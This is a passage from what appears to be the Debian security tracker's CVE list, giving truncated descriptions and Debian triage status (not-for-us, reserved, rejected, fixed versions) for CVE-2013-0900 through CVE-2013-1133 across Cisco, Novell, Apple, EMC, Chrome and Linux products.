Intracluster-communication featur ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-1133 (Cisco Unified Communications Manager (CUCM) 8.6 before 8.6(2a)su2, 8.6 ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-1132 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified C ...) NOT-FOR-US: Cisco CVE-2013-1131 (Cisco Small Business Wireless Access Points WAP200, WAP2000, WAP200E, ...) NOT-FOR-US: Cisco Small Business Wireless Access Points CVE-2013-1130 (Cisco AnyConnect Secure Mobility Client on Mac OS X uses weak permissi ...) NOT-FOR-US: Cisco CVE-2013-1129 (Memory leak in Cisco Unity Connection 9.x allows remote attackers to c ...) NOT-FOR-US: Cisco CVE-2013-1128 (Multiple cross-site request forgery (CSRF) vulnerabilities in the serv ...) NOT-FOR-US: Cisco Unified MeetingPlace CVE-2013-1127 RESERVED CVE-2013-1126 RESERVED CVE-2013-1125 (The command-line interface in Cisco Identity Services Engine Software, ...) NOT-FOR-US: Cisco CVE-2013-1124 (The Cisco Network Admission Control (NAC) agent on Mac OS X does not v ...) NOT-FOR-US: Cisco Network Admission Control CVE-2013-1123 (Multiple cross-site scripting (XSS) vulnerabilities in the server in C ...) NOT-FOR-US: Cisco Unified MeetingPlace CVE-2013-1122 (Cisco NX-OS on the Nexus 7000, when a certain Overlay Transport Virtua ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1121 (The regex engine in the BGP implementation in Cisco NX-OS, when a comp ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1120 (Multiple cross-site request forgery (CSRF) vulnerabilities on the Cisc ...) NOT-FOR-US: Cisco Unity Express CVE-2013-1119 (Buffer overflow in Cisco WebEx Recording Format (WRF) player T27 LD be ...) NOT-FOR-US: Cisco WebEx CVE-2013-1118 (Stack-based buffer overflow in Cisco WebEx Recording Format (WRF) play ...) NOT-FOR-US: Cisco WebEx CVE-2013-1117 (Buffer overflow in the exception handler in Cisco WebEx Recording Form ...) NOT-FOR-US: Cisco WebEx CVE-2013-1116 (Buffer overflow in Cisco WebEx Advanced Recording Format (ARF) player ...) NOT-FOR-US: Cisco WebEx CVE-2013-1115 (Buffer overflow in Cisco WebEx Advanced Recording Format (ARF) player ...) NOT-FOR-US: Cisco WebEx CVE-2013-1114 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unity Exp ...) NOT-FOR-US: Cisco Unity Express CVE-2013-1113 (Cross-site scripting (XSS) vulnerability in Cisco Unified Communicatio ...) NOT-FOR-US: Cisco Unified Communications Domain Manager CVE-2013-1112 (Cisco Carrier Routing System (CRS) allows remote attackers to cause a ...) NOT-FOR-US: Cisco Carrier Routing System CVE-2013-1111 (The Cisco ATA 187 Analog Telephone Adaptor with firmware 9.2.1.0 and 9 ...) NOT-FOR-US: Cisco ATA 187 Analog Telephone Adaptor CVE-2013-1110 (Cisco WebEx Training Center allow remote authenticated users to bypass ...) NOT-FOR-US: Cisco WebEx Training Center CVE-2013-1109 (Cross-site request forgery (CSRF) vulnerability in testingLibraryActio ...) NOT-FOR-US: Cisco WebEx Training Center CVE-2013-1108 (Cisco WebEx Training Center allows remote authenticated users to remov ...) NOT-FOR-US: Cisco WebEx Training Center CVE-2013-1107 (The search function in Cisco Webex Social (formerly Cisco Quad) allows ...) NOT-FOR-US: Cisco Webex Social CVE-2013-1106 RESERVED CVE-2013-1105 (Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7 ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1104 (The HTTP Profiling functionality on Cisco Wireless LAN Controller (WLC ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1103 (Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7 ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1102 (The Wireless Intrusion Prevention System (wIPS) component on Cisco Wir ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1101 RESERVED CVE-2013-1100 (The HTTP server in Cisco IOS on Catalyst switches does not properly ha ...) NOT-FOR-US: Cisco IOS CVE-2013-1099 REJECTED CVE-2013-1098 RESERVED CVE-2013-1097 (Cross-site scripting (XSS) vulnerability in a ZCC page in njwc.jar in ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-1096 (Cross-site scripting (XSS) vulnerability in the Roles Based Provisioni ...) NOT-FOR-US: Novell Identity Manager CVE-2013-1095 (Cross-site scripting (XSS) vulnerability in a ZCC page in njwc.jar in ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-1094 (Cross-site scripting (XSS) vulnerability in a ZCC page in zenworks-cor ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-1093 (Open redirect vulnerability in the fwdToURL function in the ZCC login ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-1092 (Multiple unquoted Windows search path vulnerabilities in Novell ZENwor ...) NOT-FOR-US: Novell ZENworks Desktop Management CVE-2013-1091 (Stack-based buffer overflow in Novell iPrint Client before 5.90 allows ...) NOT-FOR-US: Novell iPrint Client CVE-2013-1090 (The SUSE horde5 package before 5.0.2-2.4.1 sets incorrect ownership fo ...) - php-horde (SuSE specific packaging flaw) NOTE: https://bugzilla.suse.com/show_bug.cgi?id=811369 CVE-2013-1089 RESERVED CVE-2013-1088 (Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 ...) NOT-FOR-US: Novell iManager CVE-2013-1087 (Cross-site scripting (XSS) vulnerability in the client in Novell Group ...) NOT-FOR-US: Novell GroupWise CVE-2013-1086 (Cross-site scripting (XSS) vulnerability in WebAccess in Novell GroupW ...) NOT-FOR-US: Novell GroupWise CVE-2013-1085 (Stack-based buffer overflow in the nim: protocol handler in Novell Gro ...) NOT-FOR-US: Novell Messenger CVE-2013-1084 (Directory traversal vulnerability in the GetFle method in the umaninv ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-1083 (Unspecified vulnerability in the login functionality in the Reporting ...) NOT-FOR-US: Novell Identity Manager CVE-2013-1082 (Directory traversal vulnerability in DUSAP.php in Novell ZENworks Mobi ...) NOT-FOR-US: Novell ZENworks CVE-2013-1081 (Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile ...) NOT-FOR-US: Novell ZENworks CVE-2013-1080 (The web server in Novell ZENworks Configuration Management (ZCM) 10.3 ...) NOT-FOR-US: Novell ZENworks CVE-2013-1079 (Directory traversal vulnerability in the ISCreateObject method in an A ...) NOT-FOR-US: Novell ZENworks CVE-2013-1078 RESERVED CVE-2013-1077 REJECTED CVE-2013-1076 REJECTED CVE-2013-1075 REJECTED CVE-2013-1074 REJECTED CVE-2013-1073 REJECTED CVE-2013-1072 REJECTED CVE-2013-1071 REJECTED CVE-2013-1070 (Cross-site scripting (XSS) vulnerability in the API in Ubuntu Metal as ...) NOT-FOR-US: Ubuntu MAAS CVE-2013-1069 (Ubuntu Metal as a Service (MaaS) 1.2 and 1.4 uses world-readable permi ...) NOT-FOR-US: Ubuntu MAAS CVE-2013-1068 (The OpenStack Nova (python-nova) package 1:2013.2.3-0 before 1:2013.2. ...) - nova 2014.1.1-4 (bug #753579) [wheezy] - nova (Vulnerable code not present) - cinder 2014.1.1-3 (bug #753585) [wheezy] - cinder (Vulnerable code not present) NOTE: Requires includedir to be defined in /etc/sudoers file CVE-2013-1067 (Apport 2.12.5 and earlier uses weak permissions for core dump files cr ...) NOT-FOR-US: Apport CVE-2013-1066 (language-selector 0.110.x before 0.110.1, 0.90.x before 0.90.1, and 0. ...) NOT-FOR-US: language-selector CVE-2013-1065 (backend.py in Jockey before 0.9.7-0ubuntu7.11 does not properly use D- ...) NOT-FOR-US: jockey CVE-2013-1064 (apt-xapian-index before 0.45ubuntu2.1, 0.44ubuntu7.1, and 0.44ubuntu5. ...) - apt-xapian-index 0.47 (low; bug #724837) [wheezy] - apt-xapian-index (Minor issue, only allows a possibly prohibited update of the Xapian package index) [squeeze] - apt-xapian-index (Minor issue, only allows a possibly prohibited update of the Xapian package index) CVE-2013-1063 (usb-creator 0.2.47 before 0.2.47.1, 0.2.40 before 0.2.40ubuntu2, and 0 ...) NOT-FOR-US: usb-creator CVE-2013-1062 (ubuntu-system-service 0.2.4 before 0.2.4.1. 0.2.3 before 0.2.3.1, and ...) NOT-FOR-US: ubuntu-system-service CVE-2013-1061 (dbus/SoftwarePropertiesDBus.py in Software Properties 0.92.17 before 0 ...) - software-properties 0.92.18 (low) [wheezy] - software-properties (Minor issue) [squeeze] - software-properties (Vulnerable code not present) CVE-2013-1060 (A certain Ubuntu build procedure for perf, as distributed in the Linux ...) NOT-FOR-US: Ubuntu packaging specific CVE-2013-1059 (net/ceph/auth_none.c in the Linux kernel through 3.10 allows remote at ...) {DSA-2745-1} - linux 3.10.1-1 (low) - linux-2.6 (low) [squeeze] - linux-2.6 (CEPH was introduced in 2.6.34) CVE-2013-1058 (maas-import-pxe-files in MAAS before 13.10 does not verify the integri ...) NOT-FOR-US: Ubuntu MAAS CVE-2013-1057 (Untrusted search path vulnerability in maas-import-pxe-files in MAAS b ...) NOT-FOR-US: Ubuntu MAAS CVE-2013-1056 (X.org X server 1.13.3 and earlier, when not run as root, allows local ...) - xorg-server (Ubuntu-specific patch, see http://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-1056.html) CVE-2013-1055 RESERVED CVE-2013-1054 RESERVED CVE-2013-1053 (In crypt.c of remote-login-service, the cryptographic algorithm used t ...) NOT-FOR-US: remote-login-service Ubuntu package CVE-2013-1052 (pam-xdg-support, as used in Ubuntu 12.10, does not properly handle the ...) NOT-FOR-US: pam-xdg-support (Ubuntu-specific package) CVE-2013-1051 (apt 0.8.16, 0.9.7, and possibly other versions does not properly handl ...) - apt 0.9.7.8 [squeeze] - apt (InRelease support not used) CVE-2013-1050 (The default configuration in gnome-screensaver 3.5.4 through 3.6.0 set ...) - gnome-screensaver (Ubuntu-specific Unity patch) CVE-2013-1049 (Buffer overflow in the RFC1413 (ident) client in cfingerd 1.4.3-3 allo ...) {DSA-2635-1} - cfingerd 1.4.3-3.1 (bug #700098) NOTE: https://bugs.launchpad.net/ubuntu/+source/cfingerd/+bug/1104425 CVE-2013-1048 (The Debian apache2ctl script in the apache2 package squeeze before 2.2 ...) {DSA-2637-1} - apache2 2.2.22-13 CVE-2013-1047 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1046 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1045 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1044 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1043 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1042 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1041 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1040 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1039 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1038 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1037 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-1036 (Safari in Apple iOS before 7 allows remote attackers to execute arbitr ...) NOT-FOR-US: Apple iOS CVE-2013-1035 (The iTunes ActiveX control in Apple iTunes before 11.1 allows remote a ...) NOT-FOR-US: Apple iTunes CVE-2013-1034 (Multiple cross-site scripting (XSS) vulnerabilities in Wiki Server in ...) NOT-FOR-US: Apple Mac OS X Server CVE-2013-1033 (Screen Lock in Apple Mac OS X before 10.8.5 does not properly track se ...) NOT-FOR-US: Screen Lock in Apple Mac OS X CVE-2013-1032 (QuickTime in Apple Mac OS X before 10.8.5 allows remote attackers to e ...) NOT-FOR-US: QuickTime in Apple Mac OS X CVE-2013-1031 (Power Management in Apple Mac OS X before 10.8.5 does not properly per ...) NOT-FOR-US: Power Management in Apple Mac OS X CVE-2013-1030 (mdmclient in Mobile Device Management in Apple Mac OS X before 10.8.5 ...) NOT-FOR-US: Mobile Device Management in Apple Mac OS X CVE-2013-1029 (The kernel in Apple Mac OS X before 10.8.5 allows remote attackers to ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1028 (The IPSec implementation in Apple Mac OS X before 10.8.5, when Hybrid ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1027 (Installer in Apple Mac OS X before 10.8.5 provides an option to contin ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1026 (Buffer overflow in ImageIO in Apple Mac OS X before 10.8.5 allows remo ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1025 (Buffer overflow in CoreGraphics in Apple Mac OS X before 10.8.5 allows ...) NOT-FOR-US: Apple Mac OS X CVE-2013-1024 (CoreMedia Playback in Apple Mac OS X before 10.8.4 does not properly i ...) NOT-FOR-US: CoreMedia Playback CVE-2013-1023 (WebKit, as used in Apple Safari before 6.0.5, allows remote attackers ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-1022 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1021 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1020 (Apple QuickTime before 7.7.4 allows remote attackers to execute arbitr ...) NOT-FOR-US: Apple QuickTime CVE-2013-1019 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1018 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1017 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1016 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-1015 (Apple QuickTime before 7.7.4 allows remote attackers to execute arbitr ...) NOT-FOR-US: Apple QuickTime CVE-2013-1014 (Apple iTunes before 11.0.3 does not properly verify X.509 certificates ...) NOT-FOR-US: Apple iTunes CVE-2013-1013 (XSS Auditor in WebKit in Apple Safari before 6.0.5 does not properly r ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-1012 (Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari bef ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-1011 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1010 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1009 (WebKit, as used in Apple Safari before 6.0.5, allows remote attackers ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-1008 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1007 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1006 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1005 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1004 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1003 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1002 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1001 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-1000 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0999 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0998 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0997 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0996 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0995 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0994 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0993 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0992 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0991 (WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middl ...) NOT-FOR-US: Apple iTunes CVE-2013-0990 (SMB in Apple Mac OS X before 10.8.4, when file sharing is enabled, all ...) NOT-FOR-US: Apple CVE-2013-0989 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-0988 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-0987 (Apple QuickTime before 7.7.4 allows remote attackers to execute arbitr ...) NOT-FOR-US: Apple QuickTime CVE-2013-0986 (Buffer overflow in Apple QuickTime before 7.7.4 allows remote attacker ...) NOT-FOR-US: Apple QuickTime CVE-2013-0985 (Disk Management in Apple Mac OS X before 10.8.4 does not properly auth ...) NOT-FOR-US: Apple Mac OS X CVE-2013-0984 (Directory Service in Apple Mac OS X through 10.6.8 allows remote attac ...) NOT-FOR-US: Mac OS Server CVE-2013-0983 (Stack consumption vulnerability in CoreAnimation in Apple Mac OS X bef ...) NOT-FOR-US: Apple Mac OS X CVE-2013-0982 (The Private Browsing feature in CFNetwork in Apple Mac OS X before 10. ...) NOT-FOR-US: Apple Mac OS X CVE-2013-0981 (The IOUSBDeviceFamily driver in the USB implementation in the kernel i ...) NOT-FOR-US: Apple iOS CVE-2013-0980 (The Passcode Lock implementation in Apple iOS before 6.1.3 does not pr ...) NOT-FOR-US: Apple iOS CVE-2013-0979 (lockdownd in Lockdown in Apple iOS before 6.1.3 does not properly cons ...) NOT-FOR-US: Apple iOS CVE-2013-0978 (The ARM prefetch abort handler in the kernel in Apple iOS before 6.1.3 ...) NOT-FOR-US: Apple iOS CVE-2013-0977 (dyld in Apple iOS before 6.1.3 and Apple TV before 5.2.1 does not prop ...) NOT-FOR-US: Apple iOS CVE-2013-0976 (IOAcceleratorFamily in Apple Mac OS X before 10.8.3 allows remote atta ...) NOT-FOR-US: Mac OS X CVE-2013-0975 (Buffer overflow in QuickDraw Manager in Apple Mac OS X before 10.8.4 a ...) NOT-FOR-US: Apple Mac OS X CVE-2013-0974 (StoreKit in Apple iOS before 6.1 does not properly handle the disablin ...) NOT-FOR-US: Apple StoreKit CVE-2013-0973 (Software Update in Apple Mac OS X through 10.7.5 does not prevent plug ...) NOT-FOR-US: Mac OS X CVE-2013-0972 RESERVED CVE-2013-0971 (Use-after-free vulnerability in PDFKit in Apple Mac OS X before 10.8.3 ...) NOT-FOR-US: Mac OS X CVE-2013-0970 (Messages in Apple Mac OS X before 10.8.3 allows remote attackers to by ...) NOT-FOR-US: Mac OS X CVE-2013-0969 (Login Window in Apple Mac OS X before 10.8.3 does not prevent applicat ...) NOT-FOR-US: Mac OS X CVE-2013-0968 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0967 (CoreTypes in Apple Mac OS X before 10.8.3 includes JNLP files in the l ...) NOT-FOR-US: Mac OS X CVE-2013-0966 (The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac ...) NOT-FOR-US: Apple mod_hfs_apple CVE-2013-0965 RESERVED CVE-2013-0964 (The kernel in Apple iOS before 6.1 and Apple TV before 5.2 does not pr ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0963 (Identity Services in Apple iOS before 6.1 does not properly handle val ...) NOT-FOR-US: Identity Services in Apple iOS CVE-2013-0962 (Cross-site scripting (XSS) vulnerability in WebKit in Apple iOS before ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0961 (WebKit in Apple Safari before 6.0.3 allows remote attackers to execute ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0960 (WebKit in Apple Safari before 6.0.3 allows remote attackers to execute ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0959 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0958 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0957 (Data Protection in Apple iOS before 7 allows attackers to bypass inten ...) NOT-FOR-US: Apple iOS CVE-2013-0956 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0955 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0954 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0953 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0952 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0951 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0950 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0949 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0948 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ex ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0947 (EMC RSA Authentication Manager 8.0 before P1 allows local users to dis ...) NOT-FOR-US: EMC CVE-2013-0946 (Buffer overflow in the Library Control Program (LCP) in EMC AlphaStor ...) NOT-FOR-US: EMC CVE-2013-0945 (EMC Avamar Client before 6.1.101-89 does not verify that the server ho ...) NOT-FOR-US: EMC Avamar CVE-2013-0944 (The web-based file-restore interface in EMC Avamar Server before 6.1.0 ...) NOT-FOR-US: EMC Avamar CVE-2013-0943 (EMC NetWorker 7.6.x and 8.x before 8.1 allows local users to obtain se ...) NOT-FOR-US: EMC CVE-2013-0942 (Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Age ...) NOT-FOR-US: EMC RSA Authentication Agent CVE-2013-0941 (EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 ...) NOT-FOR-US: EMC CVE-2013-0940 (The nsrpush process in the client in EMC NetWorker before 7.6.5.3 and ...) NOT-FOR-US: EMC NetWorker CVE-2013-0939 (EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, D ...) NOT-FOR-US: EMC CVE-2013-0938 (Cross-site scripting (XSS) vulnerability in EMC Documentum Webtop befo ...) NOT-FOR-US: EMC CVE-2013-0937 (Session fixation vulnerability in EMC Documentum Webtop before 6.7 SP2 ...) NOT-FOR-US: EMC CVE-2013-0936 (Cross-site scripting (XSS) vulnerability in EMC Smarts IP Manager, Sma ...) NOT-FOR-US: EMC CVE-2013-0935 (EMC Smarts Network Configuration Manager (NCM) before 9.2 does not req ...) NOT-FOR-US: EMC CVE-2013-0934 (EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework ...) NOT-FOR-US: EMC CVE-2013-0933 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer ...) NOT-FOR-US: EMC CVE-2013-0932 (EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework ...) NOT-FOR-US: EMC CVE-2013-0931 (EMC RSA Authentication Agent 7.1.x before 7.1.2 on Windows does not en ...) NOT-FOR-US: EMC RSA CVE-2013-0930 (Buffer overflow in Drive Control Program (DCP) in EMC AlphaStor 4.0 be ...) NOT-FOR-US: EMC AlphaStor CVE-2013-0929 (Format string vulnerability in the _vsnsprintf function in rrobotd.exe ...) NOT-FOR-US: EMC AlphaStor CVE-2013-0928 (The NetWorker command processor in rrobotd.exe in the Device Manager i ...) NOT-FOR-US: EMC AlphaStor CVE-2013-0927 (Google Chrome OS before 26.0.1410.57 relies on a Pango pango-utils.c r ...) NOT-FOR-US: Chrome OS CVE-2013-0926 (Google Chrome before 26.0.1410.43 does not properly handle active cont ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0925 (Google Chrome before 26.0.1410.43 does not ensure that an extension ha ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0924 (The extension functionality in Google Chrome before 26.0.1410.43 does ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0923 (The USB Apps API in Google Chrome before 26.0.1410.43 allows remote at ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0922 (Google Chrome before 26.0.1410.43 does not properly restrict brute-for ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0921 (The Isolated Sites feature in Google Chrome before 26.0.1410.43 does n ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0920 (Use-after-free vulnerability in the extension bookmarks API in Google ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0919 (Use-after-free vulnerability in Google Chrome before 26.0.1410.43 on L ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0918 (Google Chrome before 26.0.1410.43 does not prevent navigation to devel ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0917 (The URL loader in Google Chrome before 26.0.1410.43 allows remote atta ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0916 (Use-after-free vulnerability in the Web Audio implementation in Google ...) - chromium-browser 26.0.1410.43-1 [squeeze] - chromium-browser CVE-2013-0915 (The GPU process in Google Chrome OS before 25.0.1364.173 allows attack ...) NOT-FOR-US: Overflow in Chrome-specific libs CVE-2013-0914 (The flush_signal_handlers function in kernel/signal.c in the Linux ker ...) {DSA-2668-1} - linux 3.2.41-1 (low) - linux-2.6 (low) CVE-2013-0913 (Integer overflow in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the ...) - linux 3.2.41-2 - linux-2.6 [squeeze] - linux-2.6 (Vulnerable code was introduced later) CVE-2013-0912 (WebKit in Google Chrome before 25.0.1364.160 allows remote attackers t ...) - chromium-browser 25.0.1364.160-1 [squeeze] - chromium-browser CVE-2013-0911 (Directory traversal vulnerability in Google Chrome before 25.0.1364.15 ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0910 (Google Chrome before 25.0.1364.152 does not properly manage the intera ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0909 (The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote at ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0908 (Google Chrome before 25.0.1364.152 does not properly manage bindings o ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0907 (Race condition in Google Chrome before 25.0.1364.152 allows remote att ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0906 (The IndexedDB implementation in Google Chrome before 25.0.1364.152 all ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0905 (Use-after-free vulnerability in Google Chrome before 25.0.1364.152 all ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0904 (The Web Audio implementation in Google Chrome before 25.0.1364.152 all ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0903 (Use-after-free vulnerability in Google Chrome before 25.0.1364.152 all ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0902 (Use-after-free vulnerability in the frame-loader implementation in Goo ...) - chromium-browser 25.0.1364.152-1 [squeeze] - chromium-browser CVE-2013-0901 RESERVED CVE-2013-0900 (Race condition in the International Components for Unicode (ICU) funct 